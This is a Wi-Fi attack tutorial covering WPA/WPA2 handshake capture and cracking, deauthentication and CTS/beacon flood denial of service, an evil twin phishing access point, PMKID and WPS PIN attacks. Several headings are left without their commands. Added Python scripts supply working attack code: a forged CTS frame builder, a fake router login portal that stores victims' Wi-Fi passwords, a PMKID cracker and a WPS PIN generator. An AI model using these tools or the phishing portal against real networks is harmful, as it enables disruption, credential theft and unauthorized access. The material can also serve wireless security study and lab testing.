WPA/WPA2 PSK
Setup
To restart network services:
Start capturing:
Handshake Capture (Clients needed)
Deauth
Consists in sending deauthentication frames to a client that is already connected, so that it re-authenticates and we capture the 4-way handshake of that re-authentication.
Deauth Global
The same deauthentication attack, but using the broadcast MAC address (ff:ff:ff:ff:ff:ff) as destination in order to deauthenticate every client of the AP at once.
Auth attack or Authentication DoS Mode
It may sound strange, but flooding the AP with thousands of fake client authentications (say 5000) makes it possible to kick real clients off the network and then capture their handshake when they reconnect.
The AP ends up ejecting clients, starting with those with the weakest signal.
Disassociation Amok Mode Attack
Same as the deauthentication attack, but mdk3 gives us the opportunity to supply allow/deny lists of client MAC addresses, so we choose which stations get disassociated.
Validating the handshake
Sometimes aircrack-ng tells us that it captured a handshake when the capture is actually incomplete (for example only two of the four messages). So before spending time cracking we validate the capture with pyrit.
Filtering the capture
When we are trying to capture a handshake we usually capture a lot of other traffic as well, so we need to filter the capture. Useful display filters: eapol selects the handshake frames; wlan.fc.type_subtype==0x08 selects beacons; wlan.fc.type_subtype==0x05 selects probe responses.
It is also recommended to filter on the target BSSID.
If you want tshark to do a two-pass analysis, change the -Y parameter to -R "FILTER" -2.
Hash extraction
First we need to save our handshake in HCCAP format, then convert it with hccap2john and crack it.
Cracking the handshake
Dictionary Attack
Rainbow Table
Airolib + Aircrack
With airolib we can create a dictionary of precomputed PMKs for the target SSID (the PMK depends only on the SSID and the passphrase, so the expensive PBKDF2 step is done once per candidate).
Once created we just need to use aircrack against it.
We can see that the cracking speed of aircrack-ng goes from 10k/s up to 200k/s.
Genpmk + (Cowpatty or Pyrit)
First we need to create a new dictionary of precomputed PMKs with genpmk.
And crack it with cowpatty:
Faster? Try pyrit:
Still want to go faster? Try pyrit with a database:
DoS attacks
CTS Frame Attack
802.11 uses CSMA/CA (Collision Avoidance), which adds two control frames, RTS (Request to Send) and CTS (Clear to Send), that let stations reserve the medium and avoid collisions between frames.
A CTS frame carries a Duration field, and every station that hears it sets its NAV and stays silent for that long. So what happens if we flood the network with 1000 CTS frames with the Duration field near its maximum (30,000 µs; the field is 15 bits, so 32,767 µs at most)? These are raw 802.11 control frames, not TCP traffic, and with that flood we hijack all the airtime and cause a denial of service.
First we need to capture one Clear-to-Send frame, then modify its Duration to 30,000 µs and its RA (receiver address).
Once our evil frame is created we just need to inject it into the network many times.
In that case we keep the channel busy for 1000 × 30,000 µs, about 30 seconds of reserved NAV time, and the flood can simply be kept running.
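Building the evil frame by hand, as an added example that is not the page's own tooling: the frame layout below is the standard 802.11 CTS format (2-byte frame control, 2-byte little-endian Duration, 6-byte RA, 4-byte CRC-32 FCS); the MAC addresses and the "sniffed" frame are constructed for the demo. Injecting the result still needs a monitor-mode interface and an injection tool, which is outside this offline script.

```python
import struct
import zlib

CTS_FC = 0xC4                 # frame control byte 0: type 1 (control), subtype 12 (CTS)
MAX_DURATION_US = 0x7FFF      # Duration/ID is a 15-bit NAV value (bit 15 must be 0)


def build_cts(ra: bytes, duration_us: int) -> bytes:
    """Raw 802.11 CTS frame: FC(2) | Duration(2, little-endian) | RA(6) | FCS(4).
    Every station that hears it sets its NAV to duration_us and stays silent."""
    if not 0 <= duration_us <= MAX_DURATION_US:
        raise ValueError("duration must fit in 15 bits (0..32767 us)")
    if len(ra) != 6:
        raise ValueError("RA must be a 6-byte MAC address")
    header = bytes([CTS_FC, 0x00]) + struct.pack("<H", duration_us) + ra
    fcs = struct.pack("<I", zlib.crc32(header) & 0xFFFFFFFF)  # FCS is CRC-32 over everything before it
    return header + fcs


def parse_cts(frame: bytes) -> dict:
    """Decode a CTS frame and check its FCS; returns RA, duration and FCS validity."""
    if len(frame) != 14 or frame[0] != CTS_FC:
        raise ValueError("not a CTS frame")
    duration = struct.unpack("<H", frame[2:4])[0]
    fcs_ok = struct.unpack("<I", frame[10:14])[0] == (zlib.crc32(frame[:10]) & 0xFFFFFFFF)
    return {"ra": frame[4:10].hex(":"), "duration_us": duration & MAX_DURATION_US, "fcs_ok": fcs_ok}


def retarget_cts(captured: bytes, new_ra: bytes, duration_us: int) -> bytes:
    """The page's recipe: take a sniffed CTS, rewrite Duration and RA, recompute the FCS."""
    parse_cts(captured)  # raises if what we sniffed is not actually a CTS
    return build_cts(new_ra, duration_us)


def nav_seconds(frame_count: int, duration_us: int) -> float:
    """Total medium time reserved by frame_count CTS frames sent back to back."""
    return frame_count * duration_us / 1_000_000


if __name__ == "__main__":
    sniffed = build_cts(bytes.fromhex("001122334455"), 44)        # a normal, short CTS
    evil = retarget_cts(sniffed, bytes.fromhex("66778899aabb"), 30_000)
    print(evil.hex(), parse_cts(evil), nav_seconds(1000, 30_000))
```

Many drivers append the FCS themselves when injecting through a radiotap header; if yours does, hand it the first 10 bytes only, otherwise the frame goes out with two checksums and is dropped by receivers.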
Beacon Flood Mode Attack
The beacon frame advertises the access point and contains information such as the channel the AP works on, the SSID, the supported ciphers and protocols, etc.
Beacons are transmitted in the clear because stations and other devices need these frames to find the network and extract the information they need to connect to it.
The idea of a Beacon Flood attack, as the name says, is to flood the air with a large number of fake beacons, creating many ESSIDs on the same channel as the target AP so that it gets buried in the scan list and becomes effectively invisible to users.
Michael Shutdown Exploitation
Can shut down APs using TKIP encryption and the QoS extension with 1 sniffed and 2 injected QoS data packets, but it is less effective. It abuses TKIP's Michael countermeasures: two MIC failures within 60 seconds force the AP to discard its TKIP keys and refuse traffic for 60 seconds.
Evil Twin
One of the most common techniques for obtaining the password of a wireless network is phishing with a fake access point. Devices that are not associated with any AP usually emit Probe Request frames, and these frames contain the SSIDs of the networks the device was connected to before. We abuse that information to create a fake AP with the same SSID and serve a fake router login page that asks for the Wi-Fi password.
Creating DHCP file
/etc/dhcpd.conf
Configuring the web page (router Wi-Fi login)
Search for and copy the HTML of a router login page, using the following action in its form:
And the corresponding dbconnect.php
Initializing services
We need to start apache2 and mysql
Configuring MySQL
As we can see in dbconnect.php, it connects to a database called evilTwin with the user fakeap, so we just need to configure MySQL accordingly.
Creating the DB
Creating a user for the DB
At this point, once a victim enters credentials in the web panel, they are appended to our database.
Creating the AP
With airbase we can set up our fake AP without authentication (an open network):
Configuring a new network interface
Once our fake AP is running, it exposes a new network interface (at0) that we need to configure.
Configuring iptables
The idea is to forward the traffic coming from victims on at0 out through eth0 (with NAT), so they keep internet access and nothing looks wrong to them.
Synchronize
Finally, the last step is to synchronize our rules with the fake AP.
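The credential sink from the steps above, as an added example rather than the page's own apache2 + dbconnect.php + MySQL setup: a single-file captive portal that shows a fake router login page and appends every submitted password to a table. It swaps MySQL for SQLite and PHP for Python's http.server; the ESSID "FreeWifi", the page text and the in-memory database path are assumptions for the demo. The DHCP, airbase-ng and iptables steps are unchanged.

```python
import sqlite3
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Assumptions for the demo: in-memory SQLite instead of the page's MySQL "evilTwin" database,
# and "FreeWifi" as the ESSID of the fake AP.
DB_PATH = ":memory:"
ESSID = "FreeWifi"

LOGIN_PAGE = """<html><body>
<h2>{essid} router: a firmware update requires your Wi-Fi password</h2>
<form method="POST" action="/dbconnect.php">
  <input type="hidden" name="ssid" value="{essid}">
  <input type="password" name="password" placeholder="Wi-Fi password">
  <input type="submit" value="Reconnect">
</form></body></html>"""


def open_db(path: str = DB_PATH) -> sqlite3.Connection:
    """Same role as 'Creating the DB' above: one table that the portal appends to."""
    db = sqlite3.connect(path)
    db.execute("CREATE TABLE IF NOT EXISTS creds "
               "(id INTEGER PRIMARY KEY, ssid TEXT, password TEXT, client TEXT)")
    return db


def store_credentials(db, body: bytes, client_ip: str):
    """Parse the form POST the way dbconnect.php does and append it to the table."""
    fields = parse_qs(body.decode("utf-8", "replace"))
    ssid = fields.get("ssid", [""])[0]
    password = fields.get("password", [""])[0]
    db.execute("INSERT INTO creds (ssid, password, client) VALUES (?, ?, ?)",
               (ssid, password, client_ip))
    db.commit()
    return ssid, password


def captured(db):
    """Everything harvested so far, oldest first."""
    return db.execute("SELECT ssid, password, client FROM creds ORDER BY id").fetchall()


class Portal(BaseHTTPRequestHandler):
    """Captive portal: every GET shows the login page, the POST sinks the credentials."""
    db = None

    def do_GET(self):
        page = LOGIN_PAGE.format(essid=ESSID).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(page)))
        self.end_headers()
        self.wfile.write(page)

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
        store_credentials(self.db, body, self.client_address[0])
        self.send_response(302)             # bounce back to the form; the victim assumes a typo
        self.send_header("Location", "/")
        self.end_headers()


if __name__ == "__main__":
    Portal.db = open_db()
    HTTPServer(("0.0.0.0", 80), Portal).serve_forever()   # port 80 needs root on the attack box
```

Because every GET returns the form regardless of path, any HTTP request a victim makes through at0 lands on the login page, which is what makes the redirect from the DHCP step work without per-site rules.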
Attacks without Clients
In this section we do not capture any handshake to obtain the hash or key; we attack the network in client-less mode.
PMKID Attack
This attack targets the Pairwise Master Key Identifier (PMKID), which many APs include in the RSN information element of the first EAPOL frame of the 4-way handshake. The PMKID is derived from the PMK together with the AP and client MAC addresses, so it is enough to start an association with the AP ourselves, grab that first frame and crack the PSK offline; no client needs to be connected.
Via Bettercap
The results will be exported to a pcap file.
Via hcxdumptool
Same as with bettercap, the results will be exported to a pcap file.
Export results for hashcat and crack it!
Using hcxpcaptool we can easily convert the output of bettercap or hcxdumptool into a hash that hashcat understands.
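What hashcat actually does with that exported line, as an added example that is not code from the page, bettercap or the hcx tools. The PMKID formula (HMAC-SHA1-128 over "PMK Name" || AP MAC || client MAC) is the 802.11 one, and the PMKID*AA*SPA*ESSIDhex line is the format hcxpcaptool -z wrote for hashcat mode 16800 (newer hashcat versions use mode 22000 with a different line format). The SSID, MACs and passphrase are constructed for the demo; the script builds such a line and then cracks it from a wordlist.

```python
import hashlib
import hmac

# Constructed sample values for the demo (not from the page).
SSID = "Lab-WPA2"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
TRUE_PASSPHRASE = "correct horse battery"


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), same as for the handshake."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA).
    No nonces and no client key material: one frame from the AP is enough to attack it."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def to_hashcat_16800(pmkid_value: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """Line format hcxpcaptool -z writes: PMKID*AA*SPA*ESSIDhex."""
    return "*".join([pmkid_value.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def crack_16800_line(line: str, wordlist):
    """Offline attack on one exported line: recompute the PMKID for each candidate."""
    pmkid_hex, aa_hex, spa_hex, essid_hex = line.strip().split("*")
    target = bytes.fromhex(pmkid_hex)
    aa, spa = bytes.fromhex(aa_hex), bytes.fromhex(spa_hex)
    essid = bytes.fromhex(essid_hex).decode()
    for candidate in wordlist:
        if hmac.compare_digest(pmkid(pmk_from_passphrase(candidate, essid), aa, spa), target):
            return candidate
    return None


def demo():
    """Produce the line an AP with TRUE_PASSPHRASE would leak, then crack it."""
    value = pmkid(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC)
    line = to_hashcat_16800(value, AP_MAC, STA_MAC, SSID)
    return line, crack_16800_line(line, ["password", "12345678", TRUE_PASSPHRASE])


if __name__ == "__main__":
    line, hit = demo()
    print(line)
    print("recovered:", hit)
```

Compared with the handshake attack there is no MIC, no nonces and nothing the client contributes, which is why a single EAPOL message 1 from the AP is all the capture needs; the cost per candidate is still dominated by the PBKDF2 step, so the same per-SSID PMK precomputation applies.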
WPS Attack
Wi-Fi Protected Setup, aka WPS, is a wireless network security standard that tries to make connecting devices to a router faster and easier.
WPSPinGenerator is an automatic tool available in Wifislax.
First we need to choose the interface to work with and the channels we want to listen on. Selecting the target SSID shows the generic (vendor default or computed) PINs if any are known for that network.
Finally we just need to test the PIN and wait for success. Note that after 3 failed attempts the AP's WPS may lock.
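The PIN arithmetic behind the generic PINs, as an added example that is not WPSPinGenerator's own code: a WPS PIN is 7 digits plus a checksum digit (weights 3,1,3,1,3,1,3), and the registrar protocol confirms the first 4 digits separately from the last 3, so an online brute force needs at most 10^4 + 10^3 = 11,000 attempts rather than 10^8. The "ComputePIN" derivation from the last 24 bits of the BSSID is one of the published vendor-default algorithms such tools try; the BSSID used below is constructed for the demo and the algorithm only fits the affected models.

```python
def wps_checksum(pin7: int) -> int:
    """Checksum digit for the 7 leading digits of a WPS PIN (weights 3,1,3,1,3,1,3)."""
    if not 0 <= pin7 <= 9_999_999:
        raise ValueError("need the 7 leading digits as an integer")
    accum = 0
    for pos, digit in enumerate(f"{pin7:07d}"):
        accum += int(digit) * (3 if pos % 2 == 0 else 1)
    return (10 - accum % 10) % 10


def complete_pin(pin7: int) -> str:
    """7 digits -> 8-digit PIN string with a valid checksum."""
    return f"{pin7:07d}{wps_checksum(pin7)}"


def is_valid_pin(pin: str) -> bool:
    """True if the 8-digit PIN ends in the correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def computepin_from_bssid(bssid: str) -> str:
    """'ComputePIN' default-PIN algorithm (Zhao Chunsheng):
    PIN = (last 24 bits of the BSSID) mod 10^7, plus the checksum digit."""
    tail = int(bssid.replace(":", "").replace("-", "")[-6:], 16)
    return complete_pin(tail % 10_000_000)


def candidate_pins(first_half=None):
    """Brute-force space as the registrar leaks it: 10^4 first halves, then, once the
    first half is confirmed, 10^3 second halves (digit 8 is the checksum)."""
    if first_half is None:
        return [f"{i:04d}" for i in range(10_000)]
    return [complete_pin(first_half * 1000 + j) for j in range(1000)]


if __name__ == "__main__":
    print(complete_pin(1234567))                       # the well-known default 12345670
    print(computepin_from_bssid("00:11:22:33:44:55"))  # constructed BSSID
    print(len(candidate_pins()) + len(candidate_pins(1234)), "attempts worst case")
```

Tools like WPSPinGenerator try the computed and generic PINs first because each one costs a single WPS exchange, while the 11,000-attempt brute force runs into the lockout after 3 failures that the text mentions on many APs.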